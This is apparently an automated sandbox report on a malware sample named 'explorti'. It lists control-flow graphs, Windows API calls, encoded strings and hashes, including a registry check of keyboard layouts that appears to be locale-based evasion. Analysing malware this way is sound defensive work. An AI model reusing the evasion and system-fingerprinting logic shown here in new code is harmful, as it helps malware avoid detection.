                    control_flow_graph 916 3e5dd0-3e5ece 922 3e5ef8-3e5f05 call 3fcef4 916->922 923 3e5ed0-3e5edc 916->923 925 3e5eee-3e5ef5 call 3fd569 923->925 926 3e5ede-3e5eec 923->926 925->922 926->925 928 3e5f06-3e608d call 416b7a call 3fe060 call 3f7f00 * 5 RegOpenKeyExA 926->928 945 3e6458-3e6461 928->945 946 3e6093-3e6123 call 414000 928->946 948 3e648e-3e6497 945->948 949 3e6463-3e646e 945->949 972 3e6129-3e612d 946->972 973 3e6446-3e6452 946->973 950 3e6499-3e64a4 948->950 951 3e64c4-3e64cd 948->951 953 3e6484-3e648b call 3fd569 949->953 954 3e6470-3e647e 949->954 955 3e64ba-3e64c1 call 3fd569 950->955 956 3e64a6-3e64b4 950->956 957 3e64cf-3e64da 951->957 958 3e64fa-3e6503 951->958 953->948 954->953 959 3e657e-3e6583 call 416b7a 954->959 955->951 956->955 956->959 963 3e64dc-3e64ea 957->963 964 3e64f0-3e64f7 call 3fd569 957->964 966 3e652c-3e6535 958->966 967 3e6505-3e6510 958->967 963->959 963->964 964->958 969 3e6537-3e6546 966->969 970 3e6562-3e657d call 3fcef4 966->970 976 3e6522-3e6529 call 3fd569 967->976 977 3e6512-3e6520 967->977 979 3e6558-3e655f call 3fd569 969->979 980 3e6548-3e6556 969->980 981 3e6133-3e6167 RegEnumValueW 972->981 982 3e6440 972->982 973->945 976->966 977->959 977->976 979->970 980->959 980->979 987 3e642d-3e6434 981->987 988 3e616d-3e618d 981->988 982->973 987->981 991 3e643a 987->991 993 3e6190-3e6199 988->993 991->982 993->993 994 3e619b-3e622d call 3f7c20 call 3f8350 call 3f7840 * 2 call 3e5c40 993->994 994->987
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.4148094549.00000000003E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 003E0000, based on PE: true
                    • Associated: 00000001.00000002.4148044915.00000000003E0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148094549.0000000000442000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148202834.0000000000449000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148234705.000000000044B000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148234705.00000000005D1000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148234705.00000000006B3000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148234705.00000000006E4000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148234705.00000000006EC000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148234705.00000000006FB000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148751858.00000000006FC000.00000080.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4149112678.000000000089F000.00000040.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_3e0000_explorti.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload$eBs
                    • API String ID: 0-2087237169
                    • Opcode ID: 7f9a243c663623368d1d0ac6b9a5ec7408130504f7b58df3a266d8fb7a72e97a
                    • Instruction ID: e36895a7e892d939e3a1d0004444fedb51ca8c4872ba7ae9f1f898a04e57325c
                    • Opcode Fuzzy Hash: 7f9a243c663623368d1d0ac6b9a5ec7408130504f7b58df3a266d8fb7a72e97a
                    • Instruction Fuzzy Hash: B3E1CF71900268ABEB26DFA4CC89BEEB779AB14304F5042D9E508A72D1D774AFC4CF51

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1004 3e7ce0-3e7d62 call 414000 1008 3e825e-3e827b call 3fcef4 1004->1008 1009 3e7d68-3e7d90 call 3f7840 call 3e5b00 1004->1009 1016 3e7d94-3e7db6 call 3f7840 call 3e5b00 1009->1016 1017 3e7d92 1009->1017 1022 3e7dba-3e7dd3 1016->1022 1023 3e7db8 1016->1023 1017->1016 1026 3e7e04-3e7e2f 1022->1026 1027 3e7dd5-3e7de4 1022->1027 1023->1022 1030 3e7e60-3e7e81 1026->1030 1031 3e7e31-3e7e40 1026->1031 1028 3e7dfa-3e7e01 call 3fd569 1027->1028 1029 3e7de6-3e7df4 1027->1029 1028->1026 1029->1028 1032 3e827c call 416b7a 1029->1032 1036 3e7e87-3e7e8c 1030->1036 1037 3e7e83-3e7e85 GetNativeSystemInfo 1030->1037 1034 3e7e56-3e7e5d call 3fd569 1031->1034 1035 3e7e42-3e7e50 1031->1035 1045 3e8281-3e8286 call 416b7a 1032->1045 1034->1030 1035->1032 1035->1034 1041 3e7e8d-3e7e96 1036->1041 1037->1041 1043 3e7e98-3e7e9f 1041->1043 1044 3e7eb4-3e7eb7 1041->1044 1047 3e8259 1043->1047 1048 3e7ea5-3e7eaf 1043->1048 1049 3e81ff-3e8202 1044->1049 1050 3e7ebd-3e7ec6 1044->1050 1047->1008 1052 3e8254 1048->1052 1049->1047 1055 3e8204-3e820d 1049->1055 1053 3e7ec8-3e7ed4 1050->1053 1054 3e7ed9-3e7edc 1050->1054 1052->1047 1053->1052 1057 3e81dc-3e81de 1054->1057 1058 3e7ee2-3e7ee9 1054->1058 1059 3e820f-3e8213 1055->1059 1060 3e8234-3e8237 1055->1060 1061 3e81ec-3e81ef 1057->1061 1062 3e81e0-3e81ea 1057->1062 1063 3e7eef-3e7f4b call 3f7840 call 3e5b00 call 3f7840 call 3e5b00 call 3e5c40 1058->1063 1064 3e7fc9-3e81c5 call 3f7840 call 3e5b00 call 3f7840 call 3e5b00 call 3e5c40 call 3f7840 call 3e5b00 call 3e5620 call 3f7840 call 3e5b00 call 3f7840 call 3e5b00 call 3e5c40 call 3f7840 call 3e5b00 call 3e5620 call 3f7840 call 3e5b00 call 3f7840 call 3e5b00 call 3e5c40 call 3f7840 call 3e5b00 call 3e5620 1058->1064 1065 3e8228-3e8232 1059->1065 1066 3e8215-3e821a 1059->1066 1067 3e8239-3e8243 1060->1067 1068 3e8245-3e8251 1060->1068 1061->1047 1070 3e81f1-3e81fd 1061->1070 1062->1052 1089 3e7f50-3e7f57 1063->1089 1104 3e81cb-3e81d4 1064->1104 1065->1047 1066->1065 1072 3e821c-3e8226 1066->1072 1067->1047 1068->1052 1070->1052 1072->1047 1091 3e7f5b-3e7f7b call 418a61 1089->1091 1092 3e7f59 1089->1092 1098 3e7f7d-3e7f8c 1091->1098 1099 3e7fb2-3e7fb4 1091->1099 1092->1091 1101 3e7f8e-3e7f9c 1098->1101 1102 3e7fa2-3e7faf call 3fd569 1098->1102 1103 3e7fba-3e7fc4 1099->1103 1099->1104 1101->1045 1101->1102 1102->1099 1103->1104 1104->1049 1106 3e81d6 1104->1106 1106->1057
                    APIs
                    • GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 003E7E83
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.4148094549.00000000003E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 003E0000, based on PE: true
                    • Associated: 00000001.00000002.4148044915.00000000003E0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148094549.0000000000442000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148202834.0000000000449000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148234705.000000000044B000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148234705.00000000005D1000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148234705.00000000006B3000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148234705.00000000006E4000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148234705.00000000006EC000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148234705.00000000006FB000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148751858.00000000006FC000.00000080.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4149112678.000000000089F000.00000040.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_3e0000_explorti.jbxd
                    Yara matches
                    Similarity
                    • API ID: InfoNativeSystem
                    • String ID: McsqLc==$McsqMM==$McsrKc==$eBs
                    • API String ID: 1721193555-2571449117
                    • Opcode ID: eb463d1f6a165a198d20a8a784bcff3f21bfef6bc79f64a5a792046b1f9d9504
                    • Instruction ID: ab5ccf1180b741edec79387254bd49aa229c1f311537b6ed995c2074bcada78d
                    • Opcode Fuzzy Hash: eb463d1f6a165a198d20a8a784bcff3f21bfef6bc79f64a5a792046b1f9d9504
                    • Instruction Fuzzy Hash: 08D10871E006A89BDF16BF69DD477AD7B61AB42314F9003D8E4096B3C2DB744E8487C2

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1142 416de1-416e16 GetFileType 1143 416e1c-416e27 1142->1143 1144 416ece-416ed1 1142->1144 1145 416e49-416e65 call 414000 GetFileInformationByHandle 1143->1145 1146 416e29-416e3a call 417157 1143->1146 1147 416ed3-416ed6 1144->1147 1148 416efa-416f22 1144->1148 1157 416eeb-416ef8 call 4173ed 1145->1157 1163 416e6b-416ead call 4170a9 call 416f51 * 3 1145->1163 1160 416e40-416e47 1146->1160 1161 416ee7-416ee9 1146->1161 1147->1148 1153 416ed8-416eda 1147->1153 1149 416f24-416f37 1148->1149 1150 416f3f-416f41 1148->1150 1149->1150 1165 416f39-416f3c 1149->1165 1155 416f42-416f50 call 3fcef4 1150->1155 1153->1157 1158 416edc-416ee1 call 417423 1153->1158 1157->1161 1158->1161 1160->1145 1161->1155 1178 416eb2-416eca call 417076 1163->1178 1165->1150 1178->1150 1181 416ecc 1178->1181 1181->1161
                    APIs
                    • GetFileType.KERNELBASE(?,?,00000000,00000000), ref: 00416E03
                    • GetFileInformationByHandle.KERNELBASE(?,?), ref: 00416E5D
                    • __dosmaperr.LIBCMT ref: 00416EF2
                      • Part of subcall function 00417157: __dosmaperr.LIBCMT ref: 0041718C
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.4148094549.00000000003E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 003E0000, based on PE: true
                    • Associated: 00000001.00000002.4148044915.00000000003E0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148094549.0000000000442000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148202834.0000000000449000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148234705.000000000044B000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148234705.00000000005D1000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148234705.00000000006B3000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148234705.00000000006E4000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148234705.00000000006EC000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148234705.00000000006FB000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148751858.00000000006FC000.00000080.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4149112678.000000000089F000.00000040.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_3e0000_explorti.jbxd
                    Yara matches
                    Similarity
                    • API ID: File__dosmaperr$HandleInformationType
                    • String ID: eBs
                    • API String ID: 2531987475-1845495228
                    • Opcode ID: b43ad257c7d4fceacea10976f0dbe37428ec5fdaba41228bb2a4f2a6cc4ddcbd
                    • Instruction ID: 327f44ca7dce930b2012638765cbd98cd594cf944708ae47cbd2cffe13e60052
                    • Opcode Fuzzy Hash: b43ad257c7d4fceacea10976f0dbe37428ec5fdaba41228bb2a4f2a6cc4ddcbd
                    • Instruction Fuzzy Hash: 2F416D75900308ABDF24DFA6D8419EBBBF9EF89304B11452EF956D3610EB34E885CB25

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1182 41d4d4-41d4f5 call 3fde90 1185 41d4f7 1182->1185 1186 41d50f-41d512 1182->1186 1187 41d4f9-41d4ff 1185->1187 1188 41d52e-41d53a call 41a668 1185->1188 1186->1188 1189 41d514-41d517 1186->1189 1190 41d501-41d505 1187->1190 1191 41d523-41d52c call 41d41c 1187->1191 1202 41d544-41d550 call 41d45e 1188->1202 1203 41d53c-41d53f 1188->1203 1189->1191 1192 41d519-41d51c 1189->1192 1190->1188 1194 41d507-41d50b 1190->1194 1206 41d56c-41d575 1191->1206 1195 41d552-41d562 call 417423 call 416b6a 1192->1195 1196 41d51e-41d521 1192->1196 1194->1195 1199 41d50d 1194->1199 1195->1203 1196->1191 1196->1195 1199->1191 1202->1195 1212 41d564-41d569 1202->1212 1207 41d6ab-41d6ba 1203->1207 1210 41d582-41d593 1206->1210 1211 41d577-41d57f call 418c6b 1206->1211 1215 41d595-41d5a7 1210->1215 1216 41d5a9 1210->1216 1211->1210 1212->1206 1218 41d5ab-41d5bc 1215->1218 1216->1218 1219 41d62a-41d63a call 41d667 1218->1219 1220 41d5be-41d5c0 1218->1220 1229 41d6a9 1219->1229 1230 41d63c-41d63e 1219->1230 1222 41d5c6-41d5c8 1220->1222 1223 41d6bb-41d6bd 1220->1223 1225 41d5d4-41d5e0 1222->1225 1226 41d5ca-41d5cd 1222->1226 1227 41d6c7-41d6da call 4164fd 1223->1227 1228 41d6bf-41d6c6 call 418cb3 1223->1228 1232 41d620-41d628 1225->1232 1233 41d5e2-41d5f7 call 41d4cb * 2 1225->1233 1226->1225 1231 41d5cf-41d5d2 1226->1231 1250 41d6e8-41d6ee 1227->1250 1251 41d6dc-41d6e6 1227->1251 1228->1227 1229->1207 1236 41d640-41d656 call 41a511 1230->1236 1237 41d679-41d682 1230->1237 1231->1225 1238 41d5fa-41d5fc 1231->1238 1232->1219 1233->1238 1261 41d685-41d688 1236->1261 1237->1261 1238->1232 1244 41d5fe-41d60e 1238->1244 1249 41d610-41d615 1244->1249 1249->1219 1256 41d617-41d61e 1249->1256 1253 41d6f0-41d6f1 1250->1253 1254 41d707-41d718 RtlAllocateHeap 1250->1254 1251->1250 1252 41d71c-41d727 call 417423 1251->1252 1263 41d729-41d72b 1252->1263 1253->1254 1258 41d6f3-41d6fa call 419c61 1254->1258 1259 41d71a 1254->1259 1256->1249 1258->1252 1272 41d6fc-41d705 call 418cd9 1258->1272 1259->1263 1265 41d694-41d69c 1261->1265 1266 41d68a-41d68d 1261->1266 1265->1229 1268 41d69e-41d6a6 call 41a511 1265->1268 1266->1265 1267 41d68f-41d692 1266->1267 1267->1229 1267->1265 1268->1229 1272->1252 1272->1254
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.4148094549.00000000003E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 003E0000, based on PE: true
                    • Associated: 00000001.00000002.4148044915.00000000003E0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148094549.0000000000442000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148202834.0000000000449000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148234705.000000000044B000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148234705.00000000005D1000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148234705.00000000006B3000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148234705.00000000006E4000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148234705.00000000006EC000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148234705.00000000006FB000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148751858.00000000006FC000.00000080.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4149112678.000000000089F000.00000040.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_3e0000_explorti.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: hPGA$eBs
                    • API String ID: 0-2205177332
                    • Opcode ID: f185c88d0d339aaa9b0697176a3718a3443e1c8a43972105cdc33525956d4656
                    • Instruction ID: 04fdd2f5d2be989a08a3ef4a626585067fa8a5280ff3d26ae3a204d9fbfc8f0e
                    • Opcode Fuzzy Hash: f185c88d0d339aaa9b0697176a3718a3443e1c8a43972105cdc33525956d4656
                    • Instruction Fuzzy Hash: C86125B2D002149FDF25EF68D8846EEBBB1BB45318F24402BE4496B350D7389C80CB5D

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1454 3e8290-3e8311 call 414000 1458 3e831d-3e8345 call 3f7840 call 3e5b00 1454->1458 1459 3e8313-3e8318 1454->1459 1467 3e8349-3e836b call 3f7840 call 3e5b00 1458->1467 1468 3e8347 1458->1468 1460 3e845f-3e847b call 3fcef4 1459->1460 1473 3e836f-3e8388 1467->1473 1474 3e836d 1467->1474 1468->1467 1477 3e838a-3e8399 1473->1477 1478 3e83b9-3e83e4 1473->1478 1474->1473 1481 3e83af-3e83b6 call 3fd569 1477->1481 1482 3e839b-3e83a9 1477->1482 1479 3e83e6-3e83f5 1478->1479 1480 3e8411-3e8432 1478->1480 1483 3e8407-3e840e call 3fd569 1479->1483 1484 3e83f7-3e8405 1479->1484 1485 3e8438-3e843d 1480->1485 1486 3e8434-3e8436 GetNativeSystemInfo 1480->1486 1481->1478 1482->1481 1487 3e847c-3e8481 call 416b7a 1482->1487 1483->1480 1484->1483 1484->1487 1491 3e843e-3e8445 1485->1491 1486->1491 1491->1460 1496 3e8447-3e844f 1491->1496 1497 3e8458-3e845b 1496->1497 1498 3e8451-3e8456 1496->1498 1497->1460 1499 3e845d 1497->1499 1498->1460 1499->1460
                    APIs
                    • GetNativeSystemInfo.KERNELBASE(?), ref: 003E8434
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.4148094549.00000000003E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 003E0000, based on PE: true
                    • Associated: 00000001.00000002.4148044915.00000000003E0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148094549.0000000000442000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148202834.0000000000449000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148234705.000000000044B000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148234705.00000000005D1000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148234705.00000000006B3000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148234705.00000000006E4000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148234705.00000000006EC000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148234705.00000000006FB000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148751858.00000000006FC000.00000080.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4149112678.000000000089F000.00000040.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_3e0000_explorti.jbxd
                    Yara matches
                    Similarity
                    • API ID: InfoNativeSystem
                    • String ID: eBs
                    • API String ID: 1721193555-1845495228
                    • Opcode ID: 14be8ef72e0c9fe68287ef8337926d2ad969e35b28f083a4289e20369dd3fb6e
                    • Instruction ID: afeb8f4c2b4ae534e059b45c596342f60ad20d058bd72b9698c3dfcb1e9e309a
                    • Opcode Fuzzy Hash: 14be8ef72e0c9fe68287ef8337926d2ad969e35b28f083a4289e20369dd3fb6e
                    • Instruction Fuzzy Hash: 97512871D102A89BEB25EB2ACD457EDB775EB45304F504399E808A72C1EF355E808F91

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1500 416f51-416f67 1501 416f77-416f87 1500->1501 1502 416f69-416f6d 1500->1502 1506 416fc7-416fca 1501->1506 1507 416f89-416f9b SystemTimeToTzSpecificLocalTime 1501->1507 1502->1501 1503 416f6f-416f75 1502->1503 1504 416fcc-416fd7 call 3fcef4 1503->1504 1506->1504 1507->1506 1509 416f9d-416fbd call 416fd8 1507->1509 1512 416fc2-416fc5 1509->1512 1512->1504
                    APIs
                    • SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,?), ref: 00416F93
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.4148094549.00000000003E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 003E0000, based on PE: true
                    • Associated: 00000001.00000002.4148044915.00000000003E0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148094549.0000000000442000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148202834.0000000000449000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148234705.000000000044B000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148234705.00000000005D1000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148234705.00000000006B3000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148234705.00000000006E4000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148234705.00000000006EC000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148234705.00000000006FB000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148751858.00000000006FC000.00000080.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4149112678.000000000089F000.00000040.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_3e0000_explorti.jbxd
                    Yara matches
                    Similarity
                    • API ID: Time$LocalSpecificSystem
                    • String ID: eBs
                    • API String ID: 2574697306-1845495228
                    • Opcode ID: e1e710e4571f392395b6f52d34cc117a9e43d1ca8fc91ccebfddcf4cd482db03
                    • Instruction ID: 2d47007ab2808f8258990192f88cb1c19bebdf870bdb6842ac71ec7465137687
                    • Opcode Fuzzy Hash: e1e710e4571f392395b6f52d34cc117a9e43d1ca8fc91ccebfddcf4cd482db03
                    • Instruction Fuzzy Hash: C7112EB290010CABDB11DE95D940EEFB7BCAF08314F615267E511E6180EB34EB49CB65

                    Control-flow Graph

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.4148094549.00000000003E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 003E0000, based on PE: true
                    • Associated: 00000001.00000002.4148044915.00000000003E0000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148094549.0000000000442000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148202834.0000000000449000.00000004.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148234705.000000000044B000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148234705.00000000005D1000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148234705.00000000006B3000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148234705.00000000006E4000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148234705.00000000006EC000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148234705.00000000006FB000.00000040.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4148751858.00000000006FC000.00000080.00000001.01000000.00000007.sdmp
                    • Associated: 00000001.00000002.4149112678.000000000089F000.00000040.00000001.01000000.00000007.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_3e0000_explorti.jbxd
                    Yara matches
                    Similarity
                    • API ID: Sleep
                    • String ID: eBs
                    • API String ID: 3472027048-1845495228
                    • Opcode ID: 36f6404daeeb6b86404f721e52d7744a5e78284951bd56c95ea136724f5efa77
                    • Instruction ID: 12e726aeffa2987ecd58ba2de84bfd82e13aa58357e9d3fba1127756561807f4
                    • Opcode Fuzzy Hash: 36f6404daeeb6b86404f721e52d7744a5e78284951bd56c95ea136724f5efa77
                    • Instruction Fuzzy Hash: ADF0F471E00518ABC702BF699D07B1EBB75EB02B60FD00398F9106B3D1DAB45A1087D6

                    Control-flow Graph
                    • Graph image omitted; basic blocks 416c79-416d56, with the CreateFileW call in block 416ce6-416d08
                    Memory Dump Source
                    • Source File: 00000001.00000002.4148094549.00000000003E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 003E0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_3e0000_explorti.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7bff23d753cea073bad22204ffbaa4d8eb480eb10e5a640d1c0e7f42368743a6
                    • Instruction ID: 6e96cb8525535cb756ea94d153fc795c7cd1ad946efcab12af9ec94f61b836e8
                    • Opcode Fuzzy Hash: 7bff23d753cea073bad22204ffbaa4d8eb480eb10e5a640d1c0e7f42368743a6
                    • Instruction Fuzzy Hash: D921D871A051087AEB117B65AC42BDF37399F4137CF22031AF9242B1D1DB78AD4586A9

                    Control-flow Graph
                    • Graph image omitted; basic blocks 41d6cf-41d72b, with the RtlAllocateHeap call in block 41d707-41d718
                    APIs
                    • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00000003,0041A5CD,?,0041748E,?,00000000,?), ref: 0041D711
                    Memory Dump Source
                    • Source File: 00000001.00000002.4148094549.00000000003E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 003E0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_3e0000_explorti.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocateHeap
                    • String ID:
                    • API String ID: 1279760036-0
                    • Opcode ID: e8cf26aa53e7a0ba931e3a295c0e70b6ae6e0b2354b63b9098d7ce57c5f2c921
                    • Instruction ID: 5c14b4e879190d9aaafa001194bbc37fc107fe6c5593e522ceaf3c42d1eee4ed
                    • Opcode Fuzzy Hash: e8cf26aa53e7a0ba931e3a295c0e70b6ae6e0b2354b63b9098d7ce57c5f2c921
                    • Instruction Fuzzy Hash: C4F0E971D05124669B216A629C01ADBB759EF46360B194517EC18962C1DB2CD88142ED
                    Memory Dump Source
                    • Source File: 00000001.00000002.4153205634.0000000004E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_4e00000_explorti.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0f8074bfdd531061849c082d7e6533808e0db21501920a46dd978b576a55f789
                    • Instruction ID: a5b4a8830766cd7c35ae62471d7589188d34d1995f3d99b9ea1086fc5459ba6c
                    • Opcode Fuzzy Hash: 0f8074bfdd531061849c082d7e6533808e0db21501920a46dd978b576a55f789
                    • Instruction Fuzzy Hash: 9CF0C2AB24C104BDA1A256853704AF67B6DF7C6330330C02AF817D1581F2A51AD576B4
                    Memory Dump Source
                    • Source File: 00000001.00000002.4153205634.0000000004E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_4e00000_explorti.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: bb44e2dc782b992c6f624699c0a6ae219cb2abf5f2c6398ae0a1ae6b932914bb
                    • Instruction ID: 0b82b52b265908408002656a21982a2daab6c1a53e211b56f34dd83cf9a78d78
                    • Opcode Fuzzy Hash: bb44e2dc782b992c6f624699c0a6ae219cb2abf5f2c6398ae0a1ae6b932914bb
                    • Instruction Fuzzy Hash: 16F059AB204204FED1A24B407504BF63B68FBC6330330D16AF86396180F26819E16AB0
                    Memory Dump Source
                    • Source File: 00000001.00000002.4153205634.0000000004E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_4e00000_explorti.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 784837e7b6c1148f1ae331d5b8027e696920d18b5c5e3d616718249433b9255d
                    • Instruction ID: b41242642c019865e0f9391d806df0dc23f543036e5a54f8be6bc532d5753f2f
                    • Opcode Fuzzy Hash: 784837e7b6c1148f1ae331d5b8027e696920d18b5c5e3d616718249433b9255d
                    • Instruction Fuzzy Hash: D5F0529B61D111ADDB22566230843F23FA0BB87331736A4AAE482E2483E11C28CB8371
                    Memory Dump Source
                    • Source File: 00000001.00000002.4153205634.0000000004E00000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_4e00000_explorti.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d8c210185283e0adc73cd9026cb741b5988bea832c3015629dd8c551680f6427
                    • Instruction ID: e26b5fc8a38891d5560b50e7832c08d4b6c7ea74c675397c2a0178589d4c487c
                    • Opcode Fuzzy Hash: d8c210185283e0adc73cd9026cb741b5988bea832c3015629dd8c551680f6427
